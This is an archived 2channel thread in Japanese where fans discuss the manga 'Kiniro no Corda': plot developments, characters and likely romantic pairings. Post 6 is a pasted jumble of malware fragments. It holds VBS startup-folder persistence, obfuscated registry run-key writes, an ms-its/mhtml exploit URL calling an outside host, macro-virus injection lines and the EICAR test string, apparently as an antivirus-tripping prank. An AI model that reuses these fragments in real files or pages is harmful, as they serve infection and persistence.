5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆★金色のコルダ★☆呉由姫 =part21=

1 :星奏学院某音楽教師:2006/12/24(日) 22:30:04 ID:???0
呉由姫さんの作品をマターリ語りましょう。

・ネタバレ解禁は本誌発売日(基本24日)の正午から。
・まだ漫画化されていない部分のゲームのネタバレは控え目に。
 ネタバレする場合は、件名に「※ゲーム話」、本文は改行必須。
 (メール欄でのネタバレは2ch専用ブラウザから丸見えになるので禁止)
・アニメの話はほどほどに。
・次スレ立ては970。


・前スレ
☆★金色のコルダ★☆呉由姫 =part20=
http://comic6.2ch.net/test/read.cgi/gcomic/1165821167/

・漫画の早売りバレ・マターリ雑談に関しては難民のスレへ
【漫画】金色のコルダ・早バレ語り【解禁】
http://aa5.2ch.net/test/read.cgi/nanmin/1166681899/

・ゲームに関しては女向ゲー一般のスレへ
乙女@【金色の】金色のコルダ33【(゚Д゚)ゴルァ!!】
http://game9.2ch.net/test/read.cgi/ggirl/1166665597/

・アニメに関してはアニメのスレへ
金色のコルダ〜primo passo〜 11弦目
http://anime.2ch.net/test/read.cgi/anime/1166933388/

・アニメのネタバレはアニメサロンのスレへ
【ネタバレ】金色のコルダ〜primo passo〜 2
http://anime.2ch.net/test/read.cgi/asaloon/1165219948/

2 :花と名無しさん:2006/12/24(日) 22:36:38 ID:???0
>>1
乙ですー

3 :花と名無しさん:2006/12/24(日) 22:36:52 ID:tgEabF2xO
2

4 :花と名無しさん:2006/12/24(日) 22:39:02 ID:???0
お、難民も入れてくれたんだね
一秒ごとに>>1が愛しい

5 :1:2006/12/24(日) 22:39:13 ID:???0
すまん、スレタイの「コルダ」が半角になってた。orz

6 :<body onload=window()>:2006/12/24(日) 22:52:49 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :花と名無しさん:2006/12/24(日) 23:23:46 ID:???0
>>1乙ー

そういえばスレタイの☆★はどうする?
自分はこのままでも無くしてシンプルにするのでも
どちらでもいいけど、増やすのはなーと思う

8 :花と名無しさん:2006/12/24(日) 23:41:58 ID:???0
>>1は金やんかw

つ【ネコ缶】どぞー

9 :花と名無しさん:2006/12/25(月) 01:14:55 ID:???O
>>1
乙きもり蓮

てか前スレ1000www

10 :花と名無しさん:2006/12/25(月) 01:16:30 ID:???O
盛り上がったらそれはそれで面白いな

11 :花と名無しさん:2006/12/25(月) 01:40:13 ID:???O
今回でも難民にスレたてるほどだったんだから、またフィーバーですよ

12 :花と名無しさん:2006/12/25(月) 01:41:37 ID:???0
ナナメ上に盛り上がりそうww

13 :花と名無しさん:2006/12/25(月) 01:51:15 ID:???0
アニメでは月森が1話に1回香穂子に対し何かしらアドバイスしてるわけだが、
ああいう普段からの接触が随所に描かれていたら、今回の遊園地も
まだ自然に見られたかもと思った…にしてもやっぱり強引ではあるけれど

14 :花と名無しさん:2006/12/25(月) 02:11:57 ID:???0
結果的に難民スレは立てて良かったと思うよ
進化してコルダ総合というスレになった

15 :花と名無しさん:2006/12/25(月) 06:41:02 ID:???0
1乙なのだ!

16 :花と名無しさん:2006/12/25(月) 20:11:12 ID:???O
いちおつ!

遊園地デートは元カノが気をきかせて月森と二人っきりにしてくれるはず
土浦はイライラ

17 :花と名無しさん:2006/12/25(月) 20:19:30 ID:???0
来月号、土浦の眉間にシワ寄ってないコマが何コマあるかw
月森と崎本ちゃんの会話もあるんだろうか…

18 :花と名無しさん:2006/12/25(月) 20:43:44 ID:???0
会話が成立するんだろうかw

19 :花と名無しさん:2006/12/25(月) 20:51:19 ID:???0
崎本ちゃんが一方的に話しかけてる感じだろうな

20 :花と名無しさん:2006/12/25(月) 21:04:34 ID:???0
一方的に話しかけるのってエネルギー要りそうだけどな

21 :花と名無しさん:2006/12/25(月) 21:16:39 ID:???0
そう思いきや、月森&崎本でもそれなりに話が弾んでたりして…。
それを見た香穂子がモヤモヤしてたらそれはそれでバロスw

22 :花と名無しさん:2006/12/25(月) 21:18:56 ID:???0
元カノは結構自分の言いたい事だけ言う感じだなw
相手の反応気にしない

23 :花と名無しさん:2006/12/25(月) 21:37:39 ID:???0
土浦にもグチ吐いてスッキリしたぐらいだから
一方的に話して一方的にバイバイ言って
一方的に学校押しかけて一方的に遊園地誘って…

多分つきあいも一方的に告白して一方的に盛り上がって一方的にあきちゃったんじゃん


24 :花と名無しさん:2006/12/25(月) 22:27:46 ID:???0
>>23
そんな感じだろうね
まあ、そんな脇キャラの事なんてどうでもいいけどw

それにしても今回の一件で土浦人気激減だね
無理ないが

25 :花と名無しさん:2006/12/25(月) 22:30:53 ID:???0
激減というほどか?
個人的には、肝心の土浦の描写を端折ってるからなんとも判断しがたいのだが…
屋上で月森に誘う前に、土浦との会話を入れてくれと思った次第

26 :花と名無しさん:2006/12/25(月) 22:38:42 ID:???0
まぁ、土浦も流されてしまったのは確かなわけだし
それだけでも印象良くはないな

27 :花と名無しさん:2006/12/25(月) 22:46:33 ID:???0
流されたら流されたで、それも一つの展開として構わんのだが、
だったらちゃんと「流された」ところを描いてほしかったよ
来月号はどうせ1ページ目から遊園地なんだろうしさ…

28 :花と名無しさん:2006/12/25(月) 22:48:02 ID:???0
実は既に行った後

29 :花と名無しさん:2006/12/25(月) 22:58:56 ID:???0
>>28
呉さんなら有り得るかもw

30 :花と名無しさん:2006/12/25(月) 23:01:12 ID:???0
>>28
また1回読み飛ばしたかと焦る人が続出だなw

31 :花と名無しさん:2006/12/25(月) 23:25:25 ID:???O
土浦の評価は遊園地話を読んでからだ

32 :花と名無しさん:2006/12/25(月) 23:27:45 ID:???0
柚木が不機嫌になったのは嫉妬なのかな?

33 :花と名無しさん:2006/12/26(火) 00:15:33 ID:???O
遅れ馳せながら今月号読んだ。
読むまではワクテカしてたけど、あれは無理矢理展開って言われてもしょうがないって思った。
呉さんは好きだけど、それとは別次元でこの展開はなんか腹が立つ。
そして読むたびに悲しくなる…。

34 :花と名無しさん:2006/12/26(火) 00:17:11 ID:???0
今回の話に萌えたのは少数なんだな
少なくても前回よりはマシだと思うんだが

35 :花と名無しさん:2006/12/26(火) 00:21:04 ID:???0
無理矢理すぎてキャラが人形劇かなにかで動かされてるかのように
自分の目には映った
キャラ本人の台詞というより、明らかに後ろでそう言わせてる作者が見えるから
話に入れなかった

36 :花と名無しさん:2006/12/26(火) 00:50:15 ID:???0
作者だけじゃなくて
「そろそろデートイベしましょうか」
とかって編集か肥に言われていそう

37 :花と名無しさん:2006/12/26(火) 02:43:30 ID:???0
>>36
肥というより、編集にかなり言われてそうな感じがするな。
あくまでも憶測なんだけど

38 :花と名無しさん:2006/12/26(火) 08:26:10 ID:???O
言うなら編集だろうなあ。最近のララは分かりやすい話でなきゃ駄目みたいだし

39 :花と名無しさん:2006/12/26(火) 11:53:27 ID:???0
本編の内容的には月森土浦が主流なんだろうけど、
自分は柚木火原が気になるなあ。
柚木は、前回火原が調子悪かった原因が香穂子だって気づいてるんだろうし
自分も乱されたことをわかってて(それでもいい演奏をしたけど)、
火原がそうやって香穂子に惑わされるのが不快で、自分もかき乱されたくないんだろうなあ。
今後の柚木火原の動向が気になって仕方ないよ

40 :花と名無しさん:2006/12/26(火) 11:56:38 ID:???0
>>39
少なくても3セレの柚木は『香穂子に乱されたことがいい方向に作用した』と思ってるんだが。

41 :花と名無しさん:2006/12/26(火) 12:03:16 ID:???0
>>40
それが柚木としては不本意なのでは?と自分は思った。私見だけど。

42 :花と名無しさん:2006/12/26(火) 12:23:00 ID:???O
>火原がそうやって香穂子に惑わされるのが不快で、自分もかき乱されたくないんだろうなあ。
>今後の柚木火原の動向が気になって仕方ないよ
>>40それが柚木としては不本意なのでは?と自分は思った。

禿げ上がるほど同意する

43 :花と名無しさん:2006/12/26(火) 12:26:39 ID:???0
>>39
>それでもいい演奏をした

それだからいい演奏した、の間違い


44 :花と名無しさん:2006/12/26(火) 12:38:14 ID:???0
>>43
自分の本来の演奏ではなかったがいい演奏をした、ということなんだから
それでもいい演奏をした、でも間違いではないのでは

45 :花と名無しさん:2006/12/26(火) 13:58:03 ID:???0
崎本に対する個人的見解(こいつ嫌い、ってかウザすぎ)

ありえない立ちポーズで登場
「やっぱり梁太郎だぁ…」←うっとおしっ!

後日校門で待ち伏せ
明らかに「あの子かわいー」と注目される狙い←はいはい、自信ありすぎ

ついでに香穂子も誘う
「(うふふ、あんたみたいな女全然気にならないわ。私って可愛い上に心広いのよ)」
更についでに月森も誘う
「(あら、こっちもいい男。あわよくば…うふっ)」←………

疲れてきた…オワル

46 :花と名無しさん:2006/12/26(火) 14:06:25 ID:Z8ulqODNO
以上、キモイ腐女子の妄想でした

47 :花と名無しさん:2006/12/26(火) 14:09:14 ID:???0
>>46
いきなり出てくるなよw
自分のいるべき世界にお帰りw

48 :花と名無しさん:2006/12/26(火) 14:12:53 ID:???0
>>45
ちょっと同意でワロタ
つか、今更こんな脇キャラださなきゃ息抜きイベントひとつ起こせんのか呉さんは
いや、月森にとっては息抜きにならないどころか嫌がらせみたいなものだけどw


49 :花と名無しさん:2006/12/26(火) 14:15:29 ID:???0
>>34
あの…萌えたって…一体どのあたりに萌え…?

50 :花と名無しさん:2006/12/26(火) 14:19:10 ID:???0
>>44
本来の演奏だったら1位かどうかあやしかったんだろ


51 :花と名無しさん:2006/12/26(火) 14:23:55 ID:???0
むしろ順位は低くなったけど…

とかの方がよかったなぁ。3セレの柚木は

52 :花と名無しさん:2006/12/26(火) 14:26:32 ID:???0
自分でコントロール出来ないもののせいで優勝、というのが
柚木にとっては屈辱的なんじゃないかなあ

53 :花と名無しさん:2006/12/26(火) 14:29:50 ID:???0
4セレで柚木どうなるんだろう?
3セレでいい演奏できたのに4セレで酷い順位は出来ないよねぇ

54 :花と名無しさん:2006/12/26(火) 14:32:56 ID:???0
いっそ放棄しちゃうとか…は駄目か、最終でやることじゃないよね
他キャラがそれを上回るいい演奏して順位下がるならいいんじゃないか?

自分のしようと思った演奏でなかったというより、
それの原因が香穂子であることが気に入らないんだろうと思う、柚木は。

55 :花と名無しさん:2006/12/26(火) 14:41:24 ID:???0
あんなうざい女のせいでって感じ?
そのせいで火原までおかしいし…

柚木って仮に香穂子が好きだと思ったとして、火原とどっちが好きだろうね?
火原が香穂子好きだってわかってるから踏み込まないかな

56 :花と名無しさん:2006/12/26(火) 14:47:12 ID:???0
男と女を天秤にかける男なんてヤダ
つーかキモイよどっちが好きかとか…

57 :花と名無しさん:2006/12/26(火) 15:08:22 ID:???O
>>48
そもそも息抜きイベントって必要なのか…
今までだって十分のんびりしてただろ
最後のセレくらい真剣に打ち込んでる参加者達が見たいよ

58 :花と名無しさん:2006/12/26(火) 15:16:33 ID:???0
何だか、何をやっても文句たらたら言われそうな雰囲気だな…
ここで月森土浦自覚イベントになるんならそれはそれでもいいじゃないか
次をみてみないとわからないけど

59 :花と名無しさん:2006/12/26(火) 15:36:23 ID:???O
その自覚イベントがいらないんだけどね、自分は。
リリEDならいいけど、特定EDだった場合に自覚した他キャラは失恋になるわけだしね。

60 :花と名無しさん:2006/12/26(火) 15:38:16 ID:???0
つうか、月森と土浦の自覚じゃなくて香穂子が自覚しないと意味がない。
前者の自覚はむしろいらない。

61 :花と名無しさん:2006/12/26(火) 15:40:32 ID:???0
私も自覚はいらないと思うなぁ
音楽で繋がればいいじゃない

何もない空っぽな流されるだけの女にナンデそんなに自覚しまくらなきゃいけないのか

62 :花と名無しさん:2006/12/26(火) 15:41:13 ID:???0
月森は自覚どころかそういう意味で好きかどうかもわからんがな

63 :花と名無しさん:2006/12/26(火) 15:46:56 ID:???0
自分も月森に関しては、恋愛絡みじゃなくてもいいと思ってるけどなー。
でも、元が恋愛ゲームだということも忘れてはならんだろう。
それと、誰かとの特定EDにしないなら香穂子自覚こそ不必要。

個人的には火原は特攻ないし自爆コースに進みそうな気がしなくもない。

64 :花と名無しさん:2006/12/26(火) 16:02:49 ID:???O
自分も香穂子自覚は要らないな
どうせなら音楽に惚れてくれ

65 :花と名無しさん:2006/12/26(火) 16:07:53 ID:???0
次号は土浦だけが自覚して終わりそうな気もする

66 :花と名無しさん:2006/12/26(火) 16:14:55 ID:???0
>>65
そうじゃない?
ここで月森や香穂子が自覚したらギャグとしか思えない
「君を認められない」が曖昧なままだし

67 :花と名無しさん:2006/12/26(火) 16:20:10 ID:???0
ひそかに遊園地であの無邪気な笑顔が見られるんじゃないかと期待

そして香穂子が「アレはなんなのよー!」

68 :花と名無しさん:2006/12/26(火) 16:30:00 ID:???0
黒柚木降臨並の衝撃だな、きっとw

69 :花と名無しさん:2006/12/26(火) 16:48:02 ID:???O
自覚イラネな人の大半は香穂子が嫌いだからなのか、
好きキャラが失恋するところを見たくないからなのか…
えらい刺々しい物言いしてる人が多いな、今日は

70 :花と名無しさん:2006/12/26(火) 16:49:08 ID:???0
香穂子が嫌いというより、不自然さを拭えないからかな
不自然さを感じると後ろの人の姿がちらつくし

71 :花と名無しさん:2006/12/26(火) 16:52:07 ID:???0
編集の火原プッシュで恋愛モードになると
「うざ・・」って感想しか抱けなくなった
責任取ってもらいたい

72 :花と名無しさん:2006/12/26(火) 16:54:15 ID:???0
香穂子が月森が好きだと自覚して、それでも相手にされない展開がいい
何の努力もしないで好かれてばっかりで正直良い気分がしない
その後火原か土浦とくっつけばいいよ

73 :花と名無しさん:2006/12/26(火) 16:55:11 ID:???0
>>72
それ現実的すぎて、少女漫画的にはもっともつまらない展開のような

74 :花と名無しさん:2006/12/26(火) 16:58:53 ID:???0
>>73
今まであり得ない展開がいかにも漫画的でつまらなかったんだからいいんじゃないの

75 :花と名無しさん:2006/12/26(火) 17:04:57 ID:???0
つまらなかったという主観をおしつけられても。
ていうか、おもしろいつまらないというのはお互い主観合戦だからやめとくか、ごめん。

土浦とくっつくのはおKとしても、香穂子は月森を好きになって相手にされないというより、
あくまで音楽の結びつきが深いのは月森ということになって、恋愛は土浦と、くらいがいいのかもね。
出会いの感じとか伴奏の代打に登場とかの流れから言っても、土浦有利路線と言えるし。

ゲームの月森好きとしては寂しいが、漫画は別物と思うから。

76 :花と名無しさん:2006/12/26(火) 17:08:50 ID:???0
でも、かかれてみないと何がおもしろいかもわからないよな。

ちなみに自分は雑誌で時折読んでて最近やっとコミックスを一気に読んだんだけど、
雑誌でみたときはぱっとしないなと思っていたけどこうして読むとわりといいなと思った。
ちょっと志水の出番が少ないのが物足りないけど。

77 :花と名無しさん:2006/12/26(火) 17:08:51 ID:???0
香穂子と土浦、いいカップルだと思うよ。どっちも大した魅力を感じなくて。
とっととくっ付いて恋愛はもういいからコンクール描写だけ力を入れてください呉先生。

78 :花と名無しさん:2006/12/26(火) 17:09:35 ID:???0
だから恋愛ゲームの漫画化だというのに、恋愛外してどーすんだと。
それはそもそも漫画作者がどうこう出来る問題でもあるまい。

79 :花と名無しさん:2006/12/26(火) 17:11:32 ID:???0
恋愛『も』できるゲームですから。全く問題ないと思います。

80 :花と名無しさん:2006/12/26(火) 17:11:49 ID:???0
でも、ゲームも最後の最後に「好きだ」とか言われると
「え? オマエ、いつの間にそんなに好きになってたんだよ」
って突っ込みたくなるようなドライさだからなぁ

81 :花と名無しさん:2006/12/26(火) 17:14:43 ID:???0
でも漫画にする以上、恋愛も音楽も描くと思うし、描くつもりじゃなきゃ漫画化しないと思うよ。
そもそも>>77のような人がこの漫画を何故読み続けるのかが理解できないけどね。
登場人物に魅力感じなくて話の展開も嫌なら読むのやめたらいいのにと。

82 :花と名無しさん:2006/12/26(火) 17:15:33 ID:???0
自分がどのキャラ贔屓とかは置いといて真面目に考えてみた

…やっぱり、誰かとくっつく事になるなら月森だと…
今までの呉さんのストーリー展開だと説明不足だし成り行き上強引になるけど
きっかけは彼の音だからね

83 :花と名無しさん:2006/12/26(火) 17:17:33 ID:???0
自分は柚木エンドに向かって後半盛り上げると面白くなると思うけどね

84 :花と名無しさん:2006/12/26(火) 17:19:00 ID:???O
火原も土浦もなんで好きになったかよくわからないんだが。
はっきりしたきっかけもなしに好きになるだけなられても…と思う。
あげく他のキャラとくっついて失恋とかなるとなんかなあ(結ばれたってあれだけど)
惚れさせれば萌えるってものではないと思う。

85 :花と名無しさん:2006/12/26(火) 17:19:45 ID:???0
>>81
脳内に香穂子と土浦以外に登場人物はいないのか?私が魅力を感じないのは唯一この二人だけなんで。
それに話の展開が嫌だなんて一言も書いてないんだけど。

86 :花と名無しさん:2006/12/26(火) 17:20:54 ID:???0
音楽的に意識する相手が月森、恋愛系は土浦、当て馬が火原…じゃだめかな。

でも香穂子無自覚でフラグたてまくりつつリリED希望。
ゲームのクリア後おまけイベントのような、各人彼女に好意を持ちつつも誰も捕まえてない状態で。

87 :花と名無しさん:2006/12/26(火) 17:22:11 ID:???0
>>83
そうなっても特に文句はないが(むしろ、ちょっと希望?)
でも、やっぱり>>82で月森かな

88 :花と名無しさん:2006/12/26(火) 17:23:00 ID:???0
>>84
火原は女好きだから(ゲームではそういう設定)
土浦は普通科参加者だから最初から狙ってた

89 :花と名無しさん:2006/12/26(火) 17:24:42 ID:???0
>>86
無自覚でフラグたてまくり

それが一番嫌だ…

90 :花と名無しさん:2006/12/26(火) 17:26:05 ID:???0
女好きというか、女の子とか運命の恋とかに幻想抱いてるというか、ロマンチスト設定だね<火原
女の子の友だちもいるだろうけど異性として意識することもされたこともあんまりないみたいな感じで、
たまたま女の子として意識してしまったのが香穂子、という感じかな。
まあそれも運命と言えなくもないし。

91 :花と名無しさん:2006/12/26(火) 17:27:22 ID:???O
火原は押し倒しで意識してまるで恋に恋してるようだw
女好きってのはさすがに違うような…あれはそういう意味じゃなかろう。
火原はあの空回りっぷりじゃ当て馬にすらなってないが
ひいきかげんを考えたら相殺ってことでいいんじゃね

92 :花と名無しさん:2006/12/26(火) 17:29:08 ID:???0
火原の場合どう好意的に解釈しても
合宿中に勢いで押し倒しちゃったのが好きになったきっかけとしか・・・。

93 :花と名無しさん:2006/12/26(火) 17:30:04 ID:???0
>火原は女好きだから(ゲームではそういう設定)

ああ驚いたw
思わずそうだっけ!?と思い切り突っ込むトコだったよw


94 :花と名無しさん:2006/12/26(火) 17:30:44 ID:???0
漫画の火原みてると気の毒になってきちゃうけど、
ゲームでも切なさ担当みたいなもんだから仕方ないな。

ん?トランペット一緒に弾いてあげたりとか、あの辺りから既に段階のぼってるんじゃね?
完全に意識し始めたのが押し倒しだとしても、それだけでは土浦とのやりとりの、
よかったー発言はいきなりは出ないだろうし。

95 :花と名無しさん:2006/12/26(火) 17:31:44 ID:???0
女好きっていうのはゲーム中出てくる友人の台詞そのまんまだけど
意味としてはタラシとかそういうのじゃなくてただ『女の子が好き』という感じ

96 :花と名無しさん:2006/12/26(火) 17:33:39 ID:???O
>>86
>当て馬が火原…じゃだめかな。
火原好きをなんだと思ってるんだ……

>>88
>火原は女好きだから(ゲームではそういう設定)
妙な言い方すんな

97 :花と名無しさん:2006/12/26(火) 17:34:11 ID:???0
1セレ終わったぐらいから既に火原ENDは無いと思ってた


98 :花と名無しさん:2006/12/26(火) 17:35:02 ID:???0
>>96
妙な言い方も何も長柄のセリフだ

99 :花と名無しさん:2006/12/26(火) 17:35:30 ID:???O
細かいところで段階踏んでるのが火原だから自分は火原コースかなーと思ってる
でもまあ、リリEDが一番かな

100 :花と名無しさん:2006/12/26(火) 17:37:20 ID:???0
>>96
いや、自分も火原大好きだよ。
でもゲーム内の切ない恋に苦しむ姿も好きなんで、当て馬も有りと思ってる。
あと、もうちょっと柚木との友情関係描いて欲しいなという希望もあるけどね。

227 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)